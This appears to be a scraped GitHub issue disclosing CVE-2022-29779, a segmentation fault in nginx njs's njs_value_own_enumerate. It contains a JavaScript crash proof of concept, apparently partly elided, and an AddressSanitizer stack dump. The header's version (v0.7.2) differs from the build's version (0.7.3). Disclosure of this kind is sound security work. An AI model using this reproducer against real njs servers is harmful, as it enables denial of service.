Headline
CVE-2022-29779: SEGV src/njs_value.c:240 in njs_value_own_enumerate · Issue #485 · nginx/njs
Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.
Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
function main() { var empty_arr = {}; var arr1 = [empty_arr]; var arr2 = new Uint8Array(); arr2.__proto__ = arr1; var arr3 = arr2.splice(…"bigint"); Promise.valueOf = arr3; var v9 = Array(0x20000000000000); } main();
Stack dump
AddressSanitizer:DEADLYSIGNAL
==2523460==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555b64452f1c bp 0x7ffdcdd97650 sp 0x7ffdcdd97520 T0) ==2523460==The signal is caused by a READ memory access. ==2523460==Hint: address points to the zero page. #0 0x555b64452f1b in njs_value_own_enumerate src/njs_value.c:240 #1 0x555b6448d019 in njs_object_traverse src/njs_object.c:1230 #2 0x555b644df091 in njs_builtin_match_native_function src/njs_builtin.c:726 #3 0x555b644d26cb in njs_add_backtrace_entry src/njs_error.c:1309 #4 0x555b644d26cb in njs_error_stack_new src/njs_error.c:102 #5 0x555b644d26cb in njs_error_stack_attach src/njs_error.c:161 #6 0x555b6446455e in njs_vmcode_interpreter src/njs_vmcode.c:985 #7 0x555b644bbaba in njs_function_lambda_call src/njs_function.c:703 #8 0x555b644620fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #9 0x555b6445c0ba in njs_vm_start src/njs_vm.c:553 #10 0x555b644453f8 in njs_process_script src/njs_shell.c:890 #11 0x555b64445ebf in njs_process_file src/njs_shell.c:619 #12 0x555b6444721f in main src/njs_shell.c:303 #13 0x7f301e32b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #14 0x555b64442c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/njs_value.c:240 in njs_value_own_enumerate ==2523460==ABORTING
Credit
xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)